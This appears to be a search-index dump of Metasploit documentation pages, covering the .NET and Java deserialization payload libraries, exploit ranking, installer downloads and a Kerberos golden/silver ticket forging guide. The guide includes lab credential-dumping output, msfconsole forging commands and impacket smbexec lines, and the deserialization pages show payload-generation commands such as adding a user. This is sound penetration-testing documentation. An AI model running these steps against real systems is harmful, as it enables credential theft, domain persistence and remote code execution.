    "content": "New Metasploit modules are now required to contain a Notes section containing additional information such as the Stability, Reliability and SideEffects associated with running the module. Example: . def initialize(info = {}) super( update_info( info, 'Name' =&amp;gt; 'Module name', 'Description' =&amp;gt; %q{ Module description }, 'Author' =&amp;gt; [ 'Author name' ], 'License' =&amp;gt; MSF_LICENSE, 'References' =&amp;gt; [ ['CVE', '2020-XXXX'] ], 'DisclosureDate' =&amp;gt; '2020-03-26', 'Platform' =&amp;gt; 'ruby', 'Arch' =&amp;gt; ARCH_RUBY, 'Privileged' =&amp;gt; false, 'Targets' =&amp;gt; [['Automatic', {}]], 'DefaultTarget' =&amp;gt; 0, # All new modules must contain the below information. See below for more details for allowed values 'Notes' =&amp;gt; { 'Stability' =&amp;gt; [...], 'Reliability' =&amp;gt; [...], 'SideEffects' =&amp;gt; [...] } ) ) end . ",
    "url": "/docs/development/developing-modules/module-metadata/definition-of-module-reliability-side-effects-and-stability.html",
    "relUrl": "/docs/development/developing-modules/module-metadata/definition-of-module-reliability-side-effects-and-stability.html"
  },"100": {
    "doc": "Dot Net Deserialization",
    "title": "Support Matrix",
    "content": "The following table outlines the supported gadget chains, formatters and the compatibility of each. | Gadget Chain Name | BinaryFormatter | LosFormatter | SoapFormatter | . | ClaimsPrincipal | Yes | Yes | Yes | . | TextFormattingRunProperties | Yes | Yes | Yes | . | TypeConfuseDelegate | Yes | Yes | No | . | WindowsIdentity | Yes | Yes | Yes | . ",
    "url": "/docs/development/developing-modules/libraries/deserialization/dot-net-deserialization.html#support-matrix",
    "relUrl": "/docs/development/developing-modules/libraries/deserialization/dot-net-deserialization.html#support-matrix"
  },"101": {
    "doc": "Dot Net Deserialization",
    "title": "Basic Usage",
    "content": "The library is located in Msf::Util::DotNetDeserialization and contains the following methods which are intended for use by module authors. | #generate(cmd, gadget_chain:, formatter:) . This function will generate a serialized payload to execute the specified operating system command cmd. The command is serialized using the specified gadget_chain and formatted with the specified formatter. The gadget_chain and formatter options will be specific to the vulnerability that is being executed. This functions returns a string. | #generate_formatted(stream, formatter:) . Format a SerializedStream object, as created by #generate_gadget_chain. The stream will be formatted using the specified formatter and returned as a string. | #generate_gadget_chain(cmd, gadget_chain:) . Create a gadget chain to run the specified operating system command cmd. This returns a SerializedStream object which can be inspected and modified but must formatted (using #generate_formatted) before it is useful. | . #generate is the primary function and is functionally equivalent to the following. In the future the #generate_* functions may contain additional options specific to their respective chain or formatter. stream = generate_gadget_chain(cmd, gadget_chain) formatted = generate_formatted(stream, formatter) . Example Usage . The following example uses the TextFormattingRunProperties gadget chain formatted with the LosFormatter. serialized = ::Msf::Util::DotNetDeserialization.generate( cmd, # this is the Operating System command to run gadget_chain: :TextFormattingRunProperties, formatter: :LosFormatter ) . ",
    "url": "/docs/development/developing-modules/libraries/deserialization/dot-net-deserialization.html#basic-usage",
    "relUrl": "/docs/development/developing-modules/libraries/deserialization/dot-net-deserialization.html#basic-usage"
  },"102": {
    "doc": "Dot Net Deserialization",
    "title": "Command Line Tool",
    "content": "The library also has an interface available as a standalone command line tool which is suitable for creating payloads for single-use research purposes. This tool dot_net.rb is available in the tools/payloads/ysoserial directory. The arguments for this tool are aligned with those of YSoSerial.NET, allowing the arguments of basic invocations to be the same. It should be noted however that the supported gadgets and formatters are not the same. Help output: . Usage: ./dot_net.rb [options] Generate a .NET deserialization payload that will execute an operating system command using the specified gadget chain and formatter. Available formatters: * BinaryFormatter * LosFormatter * SoapFormatter Available gadget chains: * ClaimsPrincipal * DataSet * DataSetTypeSpoof * ObjectDataProvider * TextFormattingRunProperties * TypeConfuseDelegate * WindowsIdentity Available HMAC algorithms: SHA1, HMACSHA256, HMACSHA384, HMACSHA512, MD5 Examples: ./dot_net.rb -c \"net user msf msf /ADD\" -f BinaryFormatter -g TypeConfuseDelegate -o base64 ./dot_net.rb -c \"calc.exe\" -f LosFormatter -g TextFormattingRunProperties \\ --viewstate-validation-key deadbeef --viewstate-validation-algorithm SHA1 General options: -h, --help Show this message -c, --command &amp;lt;String&amp;gt; The command to run -f, --formatter &amp;lt;String&amp;gt; The formatter to use (default: BinaryFormatter) -g, --gadget &amp;lt;String&amp;gt; The gadget chain to use (default: TextFormattingRunProperties) -o, --output &amp;lt;String&amp;gt; The output format to use (default: raw, see: --list-output-formats) --list-output-formats List available output formats, for use with --output ViewState related options: --viewstate-generator &amp;lt;String&amp;gt; The ViewState generator string to use --viewstate-validation-algorithm &amp;lt;String&amp;gt; The validation algorithm (default: SHA1, see: Available HMAC algorithms) --viewstate-validation-key &amp;lt;HexString&amp;gt; The validationKey from the web.config file . The -g / --gadget option maps to the gadget_chain argument for the generate functions while the -f / --formatter arguments maps to the formatter argument. ",
    "url": "/docs/development/developing-modules/libraries/deserialization/dot-net-deserialization.html#command-line-tool",
    "relUrl": "/docs/development/developing-modules/libraries/deserialization/dot-net-deserialization.html#command-line-tool"
  },"103": {
    "doc": "Dot Net Deserialization",
    "title": "Making Changes",
    "content": "Adding new gadget chains and formatters involves creating a new file in the respective library directory: lib/msf/util/dot_net_deserialization. The “native” gadget chain type is implemented following the MS-NRBF format and the Bindata records as defined in types/ subdirectory. Once the new gadget chain or formatter is implemented, it needs to be added to the main library file (dot_net_deserialization.rb). Since serialization chain generate is deterministic, a unit test should be added for any new gadget chain to ensure that the checksum of the BinaryFormatter representation is consistent. ",
    "url": "/docs/development/developing-modules/libraries/deserialization/dot-net-deserialization.html#making-changes",
    "relUrl": "/docs/development/developing-modules/libraries/deserialization/dot-net-deserialization.html#making-changes"
  },"104": {
    "doc": "Dot Net Deserialization",
    "title": "Further Reading",
    "content": "Since the .NET deserialization gadgets run operating system commands, the following resources can be helpful for module developers to deliver native payloads such as Meterpreter. | How to use command stagers | How to use Powershell in an exploit | . ",
    "url": "/docs/development/developing-modules/libraries/deserialization/dot-net-deserialization.html#further-reading",
    "relUrl": "/docs/development/developing-modules/libraries/deserialization/dot-net-deserialization.html#further-reading"
  },"105": {
    "doc": "Dot Net Deserialization",
    "title": "Dot Net Deserialization",
    "content": "Metasploit includes a library for leveraging .NET deserialization attacks. Using it within a module is very straight forward, the module author just needs to know two things: the gadget chain and the formatter. The library uses the same names for each of these values as the YSoSerial.NET project for compatibility, although the Metasploit library only supports a subset of the functionality. ",
    "url": "/docs/development/developing-modules/libraries/deserialization/dot-net-deserialization.html",
    "relUrl": "/docs/development/developing-modules/libraries/deserialization/dot-net-deserialization.html"
  },"106": {
    "doc": "Downloads by Version",
    "title": "Metasploit Framework Installers",
    "content": "These include Metasploit Framework only. Updates are built about once a day. See Nightly-Installers for installation instructions for Windows, OS X and Linux. ",
    "url": "/docs/development/maintainers/downloads-by-version.html#metasploit-framework-installers",
    "relUrl": "/docs/development/maintainers/downloads-by-version.html#metasploit-framework-installers"
  },"107": {
    "doc": "Downloads by Version",
    "title": "Metasploit Pro Installers",
    "content": "These include the Pro UI as well as Framework. Updates are released about once every other week for Windows and Linux. The pgp signatures below can be verified with the following public key . | Download Link | File Type | SHA1 | PGP | . | metasploit-4.22.2-windows-x64-installer.exe | Windows 64-bit | SHA1 | PGP | . | metasploit-4.22.2-windows-x64-installer.exe | Windows 64-bit | SHA1 | PGP | . | metasploit-4.22.1-windows-x64-installer.exe | Windows 64-bit | SHA1 | PGP | . | metasploit-4.22.1-linux-x64-installer.run | Linux 64-bit | SHA1 | PGP | . | metasploit-4.22.0-windows-x64-installer.exe | Windows 64-bit | SHA1 | PGP | . | metasploit-4.22.0-linux-x64-installer.run | Linux 64-bit | SHA1 | PGP | . | metasploit-4.21.1-windows-x64-installer.exe | Windows 64-bit | SHA1 | PGP | . | metasploit-4.21.1-linux-x64-installer.run | Linux 64-bit | SHA1 | PGP | . | metasploit-4.21.0-windows-x64-installer.exe | Windows 64-bit | SHA1 | PGP | . | metasploit-4.21.0-linux-x64-installer.run | Linux 64-bit | SHA1 | PGP | . | metasploit-4.20.0-windows-x64-installer.exe | Windows 64-bit | SHA1 | PGP | . | metasploit-4.20.0-linux-x64-installer.run | Linux 64-bit | SHA1 | PGP | . | metasploit-4.19.1-windows-x64-installer.exe | Windows 64-bit | SHA1 | PGP | . | metasploit-4.19.1-linux-x64-installer.run | Linux 64-bit | SHA1 | PGP | . | metasploit-4.19.0-windows-x64-installer.exe | Windows 64-bit | SHA1 | PGP | . | metasploit-4.19.0-linux-x64-installer.run | Linux 64-bit | SHA1 | PGP | . | metasploit-4.18.0-windows-x64-installer.exe | Windows 64-bit | SHA1 | PGP | . | metasploit-4.18.0-linux-x64-installer.run | Linux 64-bit | SHA1 | PGP | . | metasploit-4.17.1-windows-x64-installer.exe | Windows 64-bit | SHA1 | PGP | . | metasploit-4.17.1-linux-x64-installer.run | Linux 64-bit | SHA1 | PGP | . ",
    "url": "/docs/development/maintainers/downloads-by-version.html#metasploit-pro-installers",
    "relUrl": "/docs/development/maintainers/downloads-by-version.html#metasploit-pro-installers"
  },"108": {
    "doc": "Downloads by Version",
    "title": "Metasploit Framework Source",
    "content": "Please see the Metasploit framework releases page for the release versions of Metasploit Framework. ",
    "url": "/docs/development/maintainers/downloads-by-version.html#metasploit-framework-source",
    "relUrl": "/docs/development/maintainers/downloads-by-version.html#metasploit-framework-source"
  },"109": {
    "doc": "Downloads by Version",
    "title": "Downloads by Version",
    "content": " ",
    "url": "/docs/development/maintainers/downloads-by-version.html",
    "relUrl": "/docs/development/maintainers/downloads-by-version.html"
  },"110": {
    "doc": "Evading Anti Virus",
    "title": "Evading Anti Virus",
    "content": " ",
    "url": "/docs/using-metasploit/intermediate/evading-anti-virus.html",
    "relUrl": "/docs/using-metasploit/intermediate/evading-anti-virus.html"
  },"111": {
    "doc": "Evading Anti Virus",
    "title": "Read these links",
    "content": ". | Why encoding does not matter, and how Metasploit generates exes | Facts and myths about antivirus evasion with Metasploit | Using metasm to avoid antivirus detection ghost writing asm | . There are approximately 14 million other resources out there on the why’s and wherefores of evading antivirus, but the about articles should get you started. ",
    "url": "/docs/using-metasploit/intermediate/evading-anti-virus.html#read-these-links",
    "relUrl": "/docs/using-metasploit/intermediate/evading-anti-virus.html#read-these-links"
  },"112": {
    "doc": "Exploit Ranking",
    "title": "Exploit Ranking",
    "content": "Every exploit module has been assigned a rank based on its potential impact to the target system. Users can search, categorize, and prioritize exploits based on rankings. The ranking is implemented by adding a Rank constant at the top of the class declaration in a module: . class MetasploitModule &amp;lt; Msf::Exploit Rank = LowRanking def initialize(info={}) ... end ... end . The ranking values are one of the following, in descending order of reliability: . | Ranking | Description | . | ExcellentRanking | The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances (WMF Escape()). | . | GreatRanking | The exploit has a default target AND either auto-detects the appropriate target or uses an application-specific return address AFTER a version check. | . | GoodRanking | The exploit has a default target and it is the “common case” for this type of software (English, Windows 7 for a desktop app, 2012 for server, etc). Exploit does not auto-detect the target. | . | NormalRanking | The exploit is otherwise reliable, but depends on a specific version that is not the “common case” for this type of software and can’t (or doesn’t) reliably autodetect. | . | AverageRanking | The exploit is generally unreliable or difficult to exploit, but has a success rate of 50% or more for common platforms. | . | LowRanking | The exploit is nearly impossible to exploit (under 50% success rate) for common platforms. | . | ManualRanking | The exploit is unstable or difficult to exploit and is basically a DoS (15% success rate or lower). This ranking is also used when the module has no use unless specifically configured by the user (e.g.: exploit/unix/webapp/php_eval). | . The ranking value is available the module Class object as well as instances: . modcls = framework.exploits[\"windows/browser/ie_createobject\"] modcls.rank # =&amp;gt; 600 modcls.rank_to_s # =&amp;gt; \"excellent\" mod = modcls.new mod.rank # =&amp;gt; 600 mod.rank_to_s # =&amp;gt; \"excellent\" . ",
    "url": "/docs/using-metasploit/intermediate/exploit-ranking.html",
    "relUrl": "/docs/using-metasploit/intermediate/exploit-ranking.html"
  },"113": {
    "doc": "Forging tickets",
    "title": "Kerberos Ticket Forging (Golden/Silver tickets)",
    "content": "The auxiliary/admin/kerberos/forge_ticket module allows the forging of a golden, silver, diamond or sapphire ticket. ",
    "url": "/docs/pentesting/active-directory/kerberos/forge_ticket.html#kerberos-ticket-forging-goldensilver-tickets",
    "relUrl": "/docs/pentesting/active-directory/kerberos/forge_ticket.html#kerberos-ticket-forging-goldensilver-tickets"
  },"114": {
    "doc": "Forging tickets",
    "title": "Vulnerable Application",
    "content": "Any system leveraging kerberos as a means of authentication e.g. Active Directory, MSSQL . ",
    "url": "/docs/pentesting/active-directory/kerberos/forge_ticket.html#vulnerable-application",
    "relUrl": "/docs/pentesting/active-directory/kerberos/forge_ticket.html#vulnerable-application"
  },"115": {
    "doc": "Forging tickets",
    "title": "Actions",
    "content": "There are two kind of actions the module can run: . | FORGE_SILVER - Forge a Silver ticket - forging a service ticket. [Default] | FORGE_GOLDEN - Forge a Golden ticket - forging a ticket granting ticket. | FORGE_DIAMOND - Forge a Diamond ticket - forging a ticket granting ticket by copying the PAC of another user. | FORGE_SAPPHIRE - Forge a Golden ticket - forging a ticket granting ticket by copying the PAC of a particular user, using the S4U2Self+U2U trick. | . ",
    "url": "/docs/pentesting/active-directory/kerberos/forge_ticket.html#actions",
    "relUrl": "/docs/pentesting/active-directory/kerberos/forge_ticket.html#actions"
  },"116": {
    "doc": "Forging tickets",
    "title": "Pre-Verification steps",
    "content": ". | Obtain your targets DOMAIN via your favorite method: e.g. nmap &amp;lt;TARGET_IP&amp;gt; | Next retrieve the DOMAIN_SID: e.g. mimikatz # sekurlsa::logonpasswords or use auxiliary/gather/windows_secrets_dump | Finally get the NTHASH or AES key (prefer AES key if available) of the service account you wish to target: e.g. mimikatz # sekurlsa::logonpasswords - this output contains both NTHASH and AES keys | . ",
    "url": "/docs/pentesting/active-directory/kerberos/forge_ticket.html#pre-verification-steps",
    "relUrl": "/docs/pentesting/active-directory/kerberos/forge_ticket.html#pre-verification-steps"
  },"117": {
    "doc": "Forging tickets",
    "title": "Module usage",
    "content": ". | Start msfconsole | Do: use auxiliary/admin/kerberos/forge_ticket | Do: set DOMAIN DW.LOCAL | Do: set DOMAIN_SID S-1-5-21-1755879683-3641577184-3486455962 | Do: set NTHASH 88E4D9FABAECF3DEC18DD80905521B29 | Do: set USER fake_user | Do: set USER_RID 500 | Do: set SPN MSSqlSvc/dc1.dw.local:1433 (Option only used for silver tickets) | Do: forge_silver to generate a silver ticket or forge_golden for a golden ticket | Use your ticket which will have been stored as loot with your chosen target | Example usage in impacket: export KRB5CCNAME=/path/to/ticket python3 mssqlclient.py DW.LOCAL/[email protected] -k -no-pass . | . ",
    "url": "/docs/pentesting/active-directory/kerberos/forge_ticket.html#module-usage",
    "relUrl": "/docs/pentesting/active-directory/kerberos/forge_ticket.html#module-usage"
  },"118": {
    "doc": "Forging tickets",
    "title": "Scenarios",
    "content": "Forge Golden ticket . Golden tickets can be used for persistence in an Active Directory environment. The forged golden ticket is actually a Ticket Granting Ticket (TGT) - which can be used to request arbitrary Service tickets. This module does not connect directly to a Key Distribution Center (KDC), it instead forges its own ticket. Golden tickets can be forged using a stolen Kerberos krbtgt account, using a password hash in NTHASH format. For golden ticket attacks, the following information is required: . | DOMAIN - The domain, i.e.adf3.local | DOMAIN_SID - This is the Security Identifier for the system, i.e. S-1-5-21-1266190811-2419310613-1856291569 | NTHASH - The NTHASH for the krbtgt account, i.e. 767400b2c71afa35a5dca216f2389cd9 | USER - This username will be stored within the forged ticket, this must be a user that exists in Active Directory | USER_RID - The relative identifier(RID) for users will be stored within the forged ticket, i.e. Administrator accounts have a RID of 500 | . One way of extracting the krbtgt account NTHASH is to run the auxiliary/gather/windows_secrets_dump module: . msf6 &amp;gt; use auxiliary/gather/windows_secrets_dump msf6 auxiliary(gather/windows_secrets_dump) &amp;gt; run smb://adf3.local;Administrator:[email protected] [*] Running module against 192.168.123.13 [*] 192.168.123.13:445 - Service RemoteRegistry is already running [*] 192.168.123.13:445 - Retrieving target system bootKey [+] 192.168.123.13:445 - bootKey: 0xa03745c7a9597f105a4df1e84a5aef04 ... omitted for brevity ... [*] 192.168.123.13:445 - Decrypting NL$KM [*] 192.168.123.13:445 - Dumping cached hashes No cached hashes on this system [*] 192.168.123.13:445 - Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash) [*] 192.168.123.13:445 - Using the DRSUAPI method to get NTDS.DIT secrets [*] 192.168.123.13:445 - SID enumeration progress - 0 / 24 ( 0.00%) [*] 192.168.123.13:445 - SID enumeration progress - 24 / 24 ( 100%) # SID's: ADF3\\Administrator: S-1-5-21-1266190811-2419310613-1856291569-500 ADF3\\Guest: S-1-5-21-1266190811-2419310613-1856291569-501 ADF3\\krbtgt: S-1-5-21-1266190811-2419310613-1856291569-502 &amp;lt;------------- Use the SID from here, the part before RID 502 ADF3\\DefaultAccount: S-1-5-21-1266190811-2419310613-1856291569-503 ADF3\\j.blogs: S-1-5-21-1266190811-2419310613-1856291569-1104 ADF3\\admin: S-1-5-21-1266190811-2419310613-1856291569-1112 ADF3\\DC3$: S-1-5-21-1266190811-2419310613-1856291569-1001 ADF3\\WIN10-DC3$: S-1-5-21-1266190811-2419310613-1856291569-1608 ADF3\\WIN11-DC3$: S-1-5-21-1266190811-2419310613-1856291569-1609 ... omitted for brevity ... # NTLM hashes: ADF3\\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32ede47af254546a82b1743953cc4950::: ADF3\\Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: ADF3\\krbtgt:502:aad3b435b51404eeaad3b435b51404ee:767400b2c71afa35a5dca216f2389cd9::: &amp;lt;-- The krbtgt NTHASH . With the above information a golden ticket can be forged: . msf6 auxiliary(admin/kerberos/forge_ticket) &amp;gt; run action=FORGE_GOLDEN domain=adf3.local domain_sid=S-1-5-21-1266190811-2419310613-1856291569 nthash=767400b2c71afa35a5dca216f2389cd9 user=Administrator [+] MIT Credential Cache ticket saved on /Users/user/.msf4/loot/20220831223726_default_192.168.123.13_kerberos_ticket._550522.bin [*] Auxiliary module execution completed . This newly created golden ticket is a ticket granting ticket which can be used to generate service tickets without a username or password. Common services include WinRM, SMB, etc. Example using a golden ticket with Metasploit: . Not currently currently supported. Example using a golden ticket with impacket: . export KRB5CCNAME=/Users/user/.msf4/loot/20220831223726_default_192.168.123.13_kerberos_ticket._550522.bin python3 ~/impacket/examples/smbexec.py 'adf3.local/[email protected]' -dc-ip 192.168.123.13 -k -no-pass . If this is not working for you, there is a section dedicated to common errors below. Forging Silver ticket . A silver ticket is similar to a golden ticket. The user will compromise the password hash for a service or computer account to forge tickets which grant persistent access to services such as SMB/LDAP/MSSQL/etc. For silver ticket attacks the following information is required: . | DOMAIN - The domain, i.e.adf3.local | DOMAIN_SID This is the Security Identifier for the system, i.e. S-1-5-21-1266190811-2419310613-1856291569 | NTHASH - The NTHASH for the service or computer account, i.e. 767400b2c71afa35a5dca216f2389cd9 | USER - This username will be stored within the forged ticket, unlike with Golden tickets - this can be a non-existent user | USER_RID - The relative identifier(RID) for users will be stored within the forged ticket, i.e. Administrator accounts have a RID of 500 | SPN - The Service Principal name, i.e. CIFS for SMB access, or MSSqlSvc/dc1.dw.local:1433. Other examples can be seen by running setspn -q */* on the target | . Example Service Principal Names: . | Service Type | Server Principal Name | . | WMI | HOST or RPCSS | . | WinRM | HOST or HTTP | . | SMB | CIFS | . | LDAP | LDAP | . | MSSQL | MSSqlSvc | . One way of extracting the computer account NTHASH is to run the auxiliary/gather/windows_secrets_dump module: . msf6 &amp;gt; use auxiliary/gather/windows_secrets_dump msf6 auxiliary(gather/windows_secrets_dump) &amp;gt; run smb://adf3.local;Administrator:[email protected] [*] Running module against 192.168.123.13 [*] 192.168.123.13:445 - Service RemoteRegistry is already running [*] 192.168.123.13:445 - Retrieving target system bootKey [+] 192.168.123.13:445 - bootKey: 0xa03745c7a9597f105a4df1e84a5aef04 ... omitted for brevity ... [*] 192.168.123.13:445 - Decrypting NL$KM [*] 192.168.123.13:445 - Dumping cached hashes No cached hashes on this system [*] 192.168.123.13:445 - Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash) [*] 192.168.123.13:445 - Using the DRSUAPI method to get NTDS.DIT secrets [*] 192.168.123.13:445 - SID enumeration progress - 0 / 24 ( 0.00%) [*] 192.168.123.13:445 - SID enumeration progress - 24 / 24 ( 100%) # SID's: ADF3\\Administrator: S-1-5-21-1266190811-2419310613-1856291569-500 ADF3\\Guest: S-1-5-21-1266190811-2419310613-1856291569-501 ADF3\\krbtgt: S-1-5-21-1266190811-2419310613-1856291569-502 ADF3\\DefaultAccount: S-1-5-21-1266190811-2419310613-1856291569-503 ADF3\\j.blogs: S-1-5-21-1266190811-2419310613-1856291569-1104 ADF3\\admin: S-1-5-21-1266190811-2419310613-1856291569-1112 ADF3\\DC3$: S-1-5-21-1266190811-2419310613-1856291569-1001 &amp;lt;------------- Use the SID from the targeted computer account, the part before RID 1001 ... omitted for brevity ... # NTLM hashes: ADF3\\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32ede47af254546a82b1743953cc4950::: ADF3\\Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: ADF3\\krbtgt:502:aad3b435b51404eeaad3b435b51404ee:767400b2c71afa35a5dca216f2389cd9::: ... omitted for brevity ... ADF3\\DC3$:1001:aad3b435b51404eeaad3b435b51404ee:fbd103200439e14d4c8adad675d5f244::: &amp;lt;-- The NTHASH for the targeted computer account . With the above information a silver ticket for SMB can be forged for the target host: . msf6 auxiliary(admin/kerberos/forge_ticket) &amp;gt; run action=FORGE_SILVER domain=adf3.local domain_sid=S-1-5-21-1266190811-2419310613-1856291569 nthash=fbd103200439e14d4c8adad675d5f244 user=Administrator spn=cifs/dc3.adf3.local [+] MIT Credential Cache ticket saved on /Users/user/.msf4/loot/20220831223726_default_192.168.123.13_kerberos_ticket._550522.bin [*] Auxiliary module execution completed . Example using a silver ticket with impacket: . export KRB5CCNAME=/Users/user/.msf4/loot/20220901132003_default_192.168.123.13_kerberos_ticket._554255.bin python3 $code/impacket/examples/smbexec.py 'adf3.local/[email protected]' -dc-ip 192.168.123.13 -k -no-pass . Forging Diamond ticket . A diamond ticket is just a golden ticket (thus requiring knowledge of the krbtgt hash), with an attempt to be stealthier, by: . | Performing an AS-REQ request to retrieve a TGT for any user | Using the krbtgt hash to decrypt the real ticket | Setting properties of the forged PAC to mirror those in the valid TGT | Encrypting the forged ticket with the krbtgt hash | . The primary requirement of a Diamond ticket is the same: knowledge of the krbtgt hash of the domain. The DOMAIN_SID property is not required, as this is retrieved from the valid TGT. To perform the first step (retrieving the TGT), you must provide sufficient information to authenticate to the domain (i.e. RHOST, USERNAME and PASSWORD). Forging Sapphire ticket . A sapphire ticket is similar to a Diamond ticket, in that it retrieves a real TGT, and copies data from that PAC onto the forged ticket. However, instead of using the ticket retrieved in the initial authentication, an additional step is performed to retrieve a PAC for another (presumably high-privilege) user: . | Authenticating to the KDC | Using the S4U2Self and U2U extensions to request a TGS for a high-privilege user (this mirrors what the real user’s PAC would look like, but the ticket is unusable in high-privilege contexts) | Decrypt this information | Setting properties of the forged PAC to mirror those in the valid TGT | Encrypting the forged ticket with the krbtgt hash | . The primary requirement of a Sapphire ticket is the same as for Golden and Diamond tickets: knowledge of the krbtgt hash of the domain. The DOMAIN_SID and DOMAIN_RID properties are not required, as this is retrieved from the valid TGT. To perform the first step (retrieving the TGT), you must provide sufficient information to authenticate to the domain (i.e. RHOST, USERNAME and PASSWORD). Common Mistakes . Invalid hostname . Use the full hostname of the machine you are targeting, not just the domain: . - python3 ~/impacket/examples/smbexec.py 'adf3.local/[email protected]' -dc-ip 192.168.123.13 -k -no-pass + python3 ~/impacket/examples/smbexec.py 'adf3.local/[email protected]' -dc-ip 192.168.123.13 -k -no-pass . Invalid SPN . SPNs must be in the format */*. If this is not identical to what Active Directory is configured with, it will not work. Verbose Mode . If you set Verbose true you will set the module to run in a more verbose mode. This would be useful in cases where the ticket you are forging does not work as expected and in this case we print out the contents of the ticket after it’s been forged similar to the inspect_ticket module with the key supplied. ",
    "url": "/docs/pentesting/active-directory/kerberos/forge_ticket.html#scenarios",
    "relUrl": "/docs/pentesting/active-directory/kerberos/forge_ticket.html#scenarios"
  },"119": {
    "doc": "Forging tickets",
    "title": "Forging tickets",
    "content": " ",
    "url": "/docs/pentesting/active-directory/kerberos/forge_ticket.html",
    "relUrl": "/docs/pentesting/active-directory/kerberos/forge_ticket.html"
  },"120": {
    "doc": "Java Deserialization",
    "title": "Example code",
    "content": "In this example: . | (L11) The module includes the Msf::Exploit::JavaDeserialization mixin. | This exposes the necessary methods. | . | (L79) Then it uses the generate_java_deserialization_for_payload method to create a serialized Java object based on the CommonsCollections2 YSoSerial payload that will execute the Metasploit payload. | Note that the Metasploit payload object is passed as-is, without any conversion. | . | . 09 include Msf::Exploit::Remote::HttpClient 10 include Msf::Exploit::Powershell 11 include Msf::Exploit::JavaDeserialization 12 13 def initialize(info = {}) ... 78 def exploit 79 java_payload = generate_java_deserialization_for_payload('CommonsCollections2', payload) 80 ciphertext = aes_encrypt(java_payload) . Once the serialized object is generated and stored as java_payload, it’s then sent to the target in an exploit-specific manner. ",
    "url": "/docs/development/developing-modules/libraries/deserialization/generating-ysoserial-java-serialized-objects.html#example-code",
    "relUrl": "/docs/development/developing-modules/libraries/deserialization/generating-ysoserial-java-serialized-objects.html#example-code"
  },"121": {
    "doc": "Java Deserialization",
    "title": "Methods",
    "content": "#generate_java_deserialization_for_payload(name, payload) . This method will generate a serialized Java object that when loaded will execute the specified Metasploit payload. The payload will be converted to an operating system command using one of the supported techniques contained within this method and then passed to #generate_java_deserialization_for_command. | name - The payload name parameter must be one of the supported payloads stored in the ysoserial cache. As of this writing, the list includes: BeanShelll1, Clogure, CommonsBeanutils1, CommonsCollections2, CommonsCollections3, CommonsCollections4, CommonsCollections5, CommonsCollections6, Groovy1, Hibernate1, JBossInterceptors1, JRMPClient, JSON1, JavassistWeld1, Jdk7u21, MozillaRhino1, Myfaces1, ROME, Spring1, Spring2, and Vaadin1. While ysoserial includes additional payloads that are not listed above, they are unsupported by the library due to the need for complex inputs. Should there be use cases for additional payloads, please consider opening an issue and submitting a pull request to add support. | payload - The payload object to execute on the remote system. This is the native Metasploit payload object and it will be automatically converted to an operating system command using a technique suitable for the target platform and architecture. For example, x86 Windows payloads will be converted using a Powershell command. Not all platforms and architecture combinations are supported. Unsupported combinations will result in a RuntimeError being raised which will need to be handled by the module developer. | . #generate_java_deserialization_for_command(name, shell, command) . This method will generate a serialized Java object that when loaded will execute the specific operating system command using the specified shell. Invocation of the command through the shell effectively bypasses constraints on the characters within the operating system command. | name - The payload name parameter. This has the same significance as the name parameter for the #generate_java_deserialization_for_payload method. | shell - The shell to use for invoking the command. This value must be one of the following: . | bash - A modified version that will invoke the command using the bash executable | cmd - A modified version that will invoke the command using the Windows cmd.exe executable. | powershell - A modified version that will invoke the command using the Windows powershell.exe executable. | . | command - The operating system command to execute upon successful deserialization of the generated object. | . ",
    "url": "/docs/development/developing-modules/libraries/deserialization/generating-ysoserial-java-serialized-objects.html#methods",
    "relUrl": "/docs/development/developing-modules/libraries/deserialization/generating-ysoserial-java-serialized-objects.html#methods"
  },"122": {
    "doc": "Java Deserialization",
    "title": "Regenerating the ysoserial_payload JSON file (MAINTAINERS ONLY)",
    "content": "Neither module developers nor users need to concern themselves with the following. On occasion, Metasploit maintainers may want to re-run the script generation to incorporate new Java serialized objects from the ysoserial tool. To avoid invoking Java (and all its dependencies) at runtime, the serialized objects are generated and cached within a JSON file. The JSON file can be refreshed using a standalone Ruby script, which comes prepackaged with a Docker image that handles downloading ysoserial and necessary dependencies. The script, Dockerimage and a high-level runme.sh script is stored within tools/payloads/ysoserial. An example run looks like: . $ cd ~/git/r7/metasploit-framework/tools/payloads/ysoserial $ ./runme.sh Sending build context to Docker daemon 101.8MB Step 1/8 : FROM ubuntu ---&amp;gt; cd6d8154f1e1 Step 2/8 : RUN apt update &amp;amp;&amp;amp; apt -y upgrade ---&amp;gt; Using cache ---&amp;gt; ba7e5691ed5a Step 3/8 : RUN apt install -y wget openjdk-8-jre-headless ruby-dev make gcc ---&amp;gt; Using cache ---&amp;gt; d38488663627 Step 4/8 : RUN wget -q https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar -O ysoserial-original.jar ---&amp;gt; Using cache ---&amp;gt; 284ff722464b Step 5/8 : RUN wget -q https://github.com/pimps/ysoserial-modified/raw/master/target/ysoserial-modified.jar ---&amp;gt; Using cache ---&amp;gt; 334c1ccb6fab Step 6/8 : RUN gem install --silent diff-lcs json pry ---&amp;gt; Using cache ---&amp;gt; 9d452be9d01f Step 7/8 : COPY find_ysoserial_offsets.rb / ---&amp;gt; 61b6f339590c Step 8/8 : CMD ruby /find_ysoserial_offsets.rb ---&amp;gt; Running in ba7b14646e56 Removing intermediate container ba7b14646e56 ---&amp;gt; f4ca5ecb6848 Successfully built f4ca5ecb6848 Successfully tagged ysoserial-payloads:latest Generating payloads for BeanShell1... Generating payloads for C3P0... Error while generating or serializing payload java.lang.IllegalArgumentException: Command format is: &amp;lt;base_url&amp;gt;:&amp;lt;classname&amp;gt; at ysoserial.payloads.C3P0.getObject(C3P0.java:48) at ysoserial.GeneratePayload.main(GeneratePayload.java:34) ERROR: Errored while generating 'C3P0' and it will not be supported Generating payloads for Clojure... Generating payloads for CommonsBeanutils1... Generating payloads for CommonsCollections1... Generating payloads for CommonsCollections2... Generating payloads for CommonsCollections3... Generating payloads for CommonsCollections4... Generating payloads for CommonsCollections5... Generating payloads for CommonsCollections6... Generating payloads for FileUpload1... Error while generating or serializing payload java.lang.IllegalArgumentException: 